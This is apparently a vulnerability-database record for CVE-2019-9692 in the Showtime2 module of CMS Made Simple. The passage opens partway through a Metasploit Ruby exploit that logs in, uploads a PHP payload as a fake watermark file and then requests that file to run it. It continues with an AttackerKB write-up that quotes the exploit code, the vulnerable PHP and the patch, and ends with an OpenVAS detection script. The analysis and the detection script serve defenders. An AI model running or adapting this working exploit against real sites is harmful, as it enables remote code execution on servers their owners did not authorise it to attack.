\n'loginsubmit' => 'Submit' \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, 'Connection failed') \nend \n \nif res.code == 302 \n@csrf_name = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s \n@csrf_value = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s \n@cookies = res.get_cookies \nreturn \nend \n \nfail_with(Failure::NoAccess, 'Authentication was unsuccessful') \nend \n \ndef upload(fname, fcontent) \n# construct POST data \ndata = Rex::MIME::Message.new \ndata.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, \"form-data; name=\\\"mact\\\"\") \ndata.add_part('Upload', nil, nil, \"form-data; name=\\\"m1_upload_submit\\\"\") \ndata.add_part(@csrf_value, nil, nil, \"form-data; name=\\\"#{@csrf_name}\\\"\") \ndata.add_part(fcontent, 'text/plain', nil, \"from-data; name=\\\"m1_input_browse\\\"; filename=\\\"#{fname}\\\"\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => data.to_s, \n'headers' => { \n'Cookie' => @cookies \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, 'Connection failed') \nend \n \nif res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id=\"showoverview\"/i) \nreturn \nend \n \nprint_warning('No confidence in PHP payload success or failure') \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini') \n) \n \nunless res \nvprint_error 'Connection failed' \nreturn CheckCode::Unknown \nend \n \nif res.code == 200 \nmodule_version = Gem::Version.new(res.body.scan(/^version = \"?(\\d\\.\\d\\.\\d)\"?/).flatten.first) \nif module_version < Gem::Version.new('3.6.3') \n# Showtime2 module is uploaded and present on \"Module Manager\" section but it could be NOT installed. \nvprint_status(\"Showtime2 version: #{module_version}\") \nreturn Exploit::CheckCode::Appears \nend \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nunless Exploit::CheckCode::Appears == check \nfail_with(Failure::NotVulnerable, 'Target is not vulnerable.') \nend \n \n@csrf_name = nil \n@csrf_value = nil \n@cookies = nil \n \ndo_login \n \n# Upload PHP payload \nfname = \"#{rand_text_alphanumeric(3..9)}.php\" \nfcontent = \"<?php #{payload.encode} ?>\" \nprint_status('Uploading PHP payload.') \nupload(fname, fcontent) \n \n# Register uploaded PHP payload file for cleanup \nregister_files_for_cleanup('./' + fname) \n \n# Retrieve and execute PHP payload \nprint_status(\"Making request for '/#{fname}' to execute payload.\") \nsend_request_cgi( \n{ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname) \n}, \n15 \n) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152269/cmsms_showtime2_rce.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "attackerkb": [{"lastseen": "2021-07-20T20:19:10", "description": "CMSMS\u2019s Showtime2 module is vulnerable to an arbitrary file upload vulnerability. An authenticated attacker can exploit this by uploading a malicious payload, and gain remote code execution.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n## Background\n\nCMS Made Simple (CMSMS) is an open source content management system. It can be used for various purposes such as galleries, company and user directories, guestbooks, E-Commerce, blogs, etc, depending on the module the user installs. It is written in PHP, and runs on MySQL.\n\nOne of the commonly downloaded modules for CMSMS is called Showtime2, a slideshow feature. In it, the watermark support allows an authenticated user (likely an administrator) to upload a watermark image, which can be abused to upload a malicious payload.\n\nA Metasploit module was submitted on March 19th 2019, which allowed me to investigate the vulnerability.\n\n## Vulnerability Analysis\n\n### Environment Setup\n\nIn order to analyize the vulnerability, we need to set up a vulnerable environment. The minimal requirements are:\n\n * A Ubuntu VM that supports Apache, PHP, and MySQL. \n\n * CMS Made Simple. Since the vulnerability doesn\u2019t actually come from the CMS, the latest should work. \n\n * A vulnerable version of [Showtime2](<http://dev.cmsmadesimple.org/project/files/1365>). You can just download the XML file, and import it from the module manager in CMSMS. Once imported, an \u201cinstall\u201d button will be available for you to actually install the vulnerable Showtime2 module. \n\n\n### Debugging CMSMS\n\nLike other exploit analysis cases, we usually start off with a proof-of-concept from the Metasploit module, and this one is no exception. Since the vulnerability involves uploading something over HTTP, the key moment would be this block of code from the exploit:\n \n \n data = Rex::MIME::Message.new\n data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, \"form-data; name=\\\"mact\\\"\")\n data.add_part('Upload', nil, nil, \"form-data; name=\\\"m1_upload_submit\\\"\")\n data.add_part(@csrf_value, nil, nil, \"form-data; name=\\\"#{@csrf_name}\\\"\")\n data.add_part(fcontent, 'text/plain', nil, \"from-data; name=\\\"m1_input_browse\\\"; filename=\\\"#{fname}\\\"\")\n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'headers' => {\n 'Cookie' => @cookies\n }\n )\n \n\nWe can see that the exploit uses the Metasploit\u2019s HttpClient API to make a request to `admin/moduleinterface.php`, so this would be our starting point for the analysis. What is the application doing to our malicious upload request? Let\u2019s check it out.\n\nBy looking at the source code for `moduleinterface.php`, my high level understanding of the code is that this is meant for loading a third-party module. One of the first things we see is the use of the `mact` parameter, and how the code wants to split that into multiple variables:\n \n \n if (isset($_REQUEST['mact'])) {\n $ary = explode(',', cms_htmlentities($_REQUEST['mact']), 4);\n $module = (isset($ary[0])?$ary[0]:'');\n $id = (isset($ary[1])?$ary[1]:'m1_');\n $action = (isset($ary[2])?$ary[2]:'');\n }\n \n\nBased on the `mact` data coming from the exploit, we can break down our data to these:\n\n * module = \u201cShowtime2\u201d \n\n * id = \u201cm1_\u201d \n\n * action = \u201cdefaultadmin\u201d \n\n\nAfter that, `moduleinterface.php` creates a new instance for the module the exploit asked by doing:\n \n \n $modinst = ModuleOperations::get_instance()->get_module_instance($module);\n \n\nWe know that the exploit is requesting the Showtime2 module, which means `$modinst` is technically a Showtime2 object (found as `Showtime2.module.php`), and it extends CMSModule (the base class that can be found as `class.CMSModule.php`). Once the instance is ready, the module interface triggers an action toward the end of the code:\n \n \n $modinst->DoActionBase($action, $id, $params, '', $smarty);\n \n\nFor a CMSMS module, the term \u201caction\u201d means the a feature to support. For example, if you have a module that supports editing a slideshow, then you could call your action \u201ceditslideshow\u201d, and this would be implemented as its own PHP file.\n\nThe `DoAction*` methods actually come from CMSModule (the base class the Showtime2 object extends from), and it basically triggers a PHP file to be included from the modules directory (oh and look, there is even a directory traversal patch):\n \n \n if ($name != '') {\n //Just in case DoAction is called directly and it's not overridden.\n //See: http://0x6a616d6573.blogspot.com/2010/02/cms-made-simple-166-file-inclusion.html\n $name = preg_replace('/[^A-Za-z0-9\\-_+]/', '', $name);\n \n $filename = $this->GetModulePath().'/action.' . $name . '.php';\n if( !is_file($filename) ) {\n @trigger_error(\"$name is an unknown acton of module \".$this->GetName());\n throw new \\CmsError404Exception(\"Module action not found\");\n }\n \n // these are included in scope in the included file for convenience.\n $gCms = CmsApp::get_instance();\n $db = $gCms->GetDb();\n $config = $gCms->GetConfig();\n $smarty = ( $this->_action_tpl ) ? $this->_action_tpl : $smarty = $gCms->GetSmarty()->get_template_parent();\n include($filename);\n }\n \n\nIf you recall what the exploit is sending in the `mact` parameter, the specific action we should be looking for is `defaultadmin`. So based on the above code, we should be looking at `action.defaultadmin.php` in Showtime2\u2019s directory.\n\nAnd that\u2019s about how much we need to know about the mechanics of CMSMS, let\u2019s move on to the Showtime2 code.\n\n### Debugging Showtime2\u2019s defaultadmin Action\n\nThe most interesting part of the `defaultadmin` action code is of course the upload routine, which occurs almost at the beginning of the file:\n \n \n if( isset($params['upload_submit'])){\n $params = array('active_tab' => 'watermark');\n \n $fieldName=$id.'input_browse';\n \n if (!isset ($_FILES[$fieldName]) || !isset ($_FILES)\n || !is_array ($_FILES[$fieldName]) || !$_FILES[$fieldName]['name']){\n $params['message'] = $this->Lang('error_nofilesuploaded');\n $smarty->assign('message',$this->Lang('error_nofilesuploaded'));\n }else{\n $file = $_FILES[$fieldName];\n // cleanup the filename\n $pos = strrpos($file['name'], '.');\n $alias = substr($file['name'], 0, $pos);\n $alias = preg_replace('/[^a-z0-9-_]+/i','-',$alias);\n $alias = trim($alias . substr($file['name'], $pos), '-');\n $uploadfile = $config['image_uploads_path'].'/'. $alias;\n \n if (!@move_uploaded_file($file['tmp_name'], $uploadfile)) {\n $smarty->assign('message',$this->Lang('error_nofilesuploaded'));\n }else{\n chmod($uploadfile, 0644);\n $this->SetPreference(\"watermark_file\", $alias);\n $smarty->assign('message',$this->Lang('file_uploaded'));\n $create_watermark =true;\n }\n }\n }\n \n\nAfter the file is uploaded, it is treated as an image. For example, the next step after the upload is watermarking the image:\n \n \n if ($create_watermark){\n $source_image = '../modules/Showtime2/images/watermark_example_org.jpg';\n $dest_image = '../modules/Showtime2/images/watermark_example_new.jpg';\n if(!showtime2_image::watermark_image($source_image,$dest_image,false)){\n $smarty->assign('message',$this->Lang('watermark_warning'));\n }\n }\n \n\nBut really, there is way to be sure whether the user uploaded is an image or not; the code just assumes it is. This is what allows the attacker to upload whatever they want and leave a backdoor on the target server.\n\nAnd this is how much we need to know about the vulnerability. Now that we know how CMSMS utilizes module interface to load a module, and how our file is uploaded, let\u2019s look at the patch.\n\n## Patch Analysis\n\nAccording to the diff [here](<http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47>), we know that the patch is implemented in the `watermark_image` function in `class.showtime2_image.php`. And it went from the vulnerable code like this (from rev 14)\n \n \n $watermark_file = $mod->GetPreference('watermark_file');\n if ($watermark_file=='watermark.png'){\n $watermark_file = $config['root_path'].'/modules/Showtime2/images/watermark.png';\n }else{\n $watermark_file = $config['image_uploads_path'].'/'.$watermark_file;\n }\n if (!file_exists($watermark_file)) return false;\n \n\nTo this (rev 47, with the log message indicating this is a security fix):\n \n \n $watermark_file = $mod->GetPreference('watermark_file');\n if ($watermark_file=='watermark.png'){\n $watermark_file = $config['root_path'].'/modules/Showtime2/images/watermark.png';\n }else{\n $watermark_file = $config['image_uploads_path'].'/'.$watermark_file;\n }\n $fext = strtoupper(substr($watermark_file, strrpos($watermark_file, '.')));\n if (!in_array($fext,array('.GIF','.JPG','.JPEG','.PNG')))\n unlink($watermark_file);\n if (!file_exists($watermark_file)) return false;\n \n\nSo it looks like the intention of the fix is to check the file extension and make sure the file type is one of these: GIF, JPG, JPEG, and PNG. If there is no match, then it deletes the uploaded file. For the most part, that sounds like a good plan.\n\nA slight concern is that in PHP, you don\u2019t always need the file to be `.php` to be able to execute code, in some cases it could be anything. Take the following proof-of-concept for example, I\u2019m creating a PHP file named as \u201cfake_image.PNG\u201d, and then I include it from a separate file. The `include` will still treat the fake image file as a PHP file anyway:\n \n \n root@sinn3r-virtual-machine:/var/www/html# echo \"<?php echo 'Hello World'; ?>\" > fake_image.PNG\n root@sinn3r-virtual-machine:/var/www/html# echo \"<?php include('fake_image.PNG'); ?>\" > demo.php\n root@sinn3r-virtual-machine:/var/www/html# curl http://localhost/demo.php\n Hello World\n \n\nLuckily for the vendor, the exploit doesn\u2019t rely on a `include` to exploit the payload, instead it relies on an HTTP request like this:\n \n \n print_status(\"Making request for '/#{fname}' to execute payload.\")\n send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)\n },\n 15\n )\n \n\nHowever, the ability to upload a PHP file with an image extension name is still worth noting from an attacker\u2019s perspective, because it potentially be chained in case of a file inclusion vulnerability in the future.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-03-11T00:00:00", "type": "attackerkb", "title": "CMS Made Simple (CMSMS) Showtime2 Post Auth Arbitrary File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9692"], "modified": "2020-02-13T00:00:00", "id": "AKB:EE71C50D-5A60-4738-908D-A92A3ADB937D", "href": "https://attackerkb.com/topics/LxUttAliKO/cms-made-simple-cmsms-showtime2-post-auth-arbitrary-file-upload-vulnerability", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-10-09T14:48:57", "description": "CMS Made Simple is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-03-12T00:00:00", "type": "openvas", "title": "CMS Made Simple < 2.2.10 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-9058", "CVE-2019-9692", "CVE-2019-9056", "CVE-2019-9055", "CVE-2019-9059", "CVE-2019-9057", "CVE-2019-9693"], "modified": "2019-10-07T00:00:00", "id": "OPENVAS:1361412562310113353", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113353", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113353\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-12 13:34:54 +0200 (Tue, 12 Mar 2019)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2019-9692\", \"CVE-2019-9693\", \"CVE-2019-9055\", \"CVE-2019-9056\",\n \"CVE-2019-9057\", \"CVE-2019-9058\", \"CVE-2019-9059\");\n\n script_name(\"CMS Made Simple < 2.2.10 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"cms_made_simple_detect.nasl\");\n script_mandatory_keys(\"cmsmadesimple/installed\");\n\n script_tag(name:\"summary\", value:\"CMS Made Simple is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - class.showtime2_image.php does not ensure that a watermark file\n has a standard image file extension\n\n - an authenticated user can achieve SQL Injection in class.showtime2_data.php\n via the functions _updateshow (parameter show_id), _inputshow (parameter show_id),\n _Getshowinfo (parameter show_id), _Getpictureinfo (parameter picture_id),\n _AdjustNameSeq (parameter shownumber), _Updatepicture (parameter picture_id)\n and _Deletepicture (parameter picture_id)\n\n - In the module DesignManager (in the files action.admin_bulk_css.php and action.admin_bulk_template.php),\n with an unprivileged user with Designer permissions, it is possible to reach an unserialize call\n with a crafted value in the m1_allparms parameter and achieve object injection\n\n - In the module FrontEndUsers (in the files class.FrontEndUsersManipulate.php and class.FrontEndUsersManipulator.php),\n it is possible to reach an unserialize call with an untrusted __FEU__ cookie and achieve authenticated object injection\n\n - In the module FilePicker, it is possible to reach an unserialize call with an untrusted parameter\n and achieve authenticated object injection\n\n - In the administrator page admin/changegroupperm.php, it is possible to send a crafted value in the sel_groups\n parameter that leads to authenticated object injection\n\n - It is possible, with an administrator account, to achieve command injection by modifying the path of the e-mail executable\n in Mail Settings, setting 'sendmail' in the 'Mailer' option and launching the 'Forgot your password' feature\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to read sensitive information\n and modify the target system.\");\n script_tag(name:\"affected\", value:\"CMS Made Simple through version 2.2.9.\");\n script_tag(name:\"solution\", value:\"Update to version 2.2.10.\");\n\n script_xref(name:\"URL\", value:\"https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:cmsmadesimple:cms_made_simple\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less( version: version, test_version: \"2.2.10\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"2.2.10\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}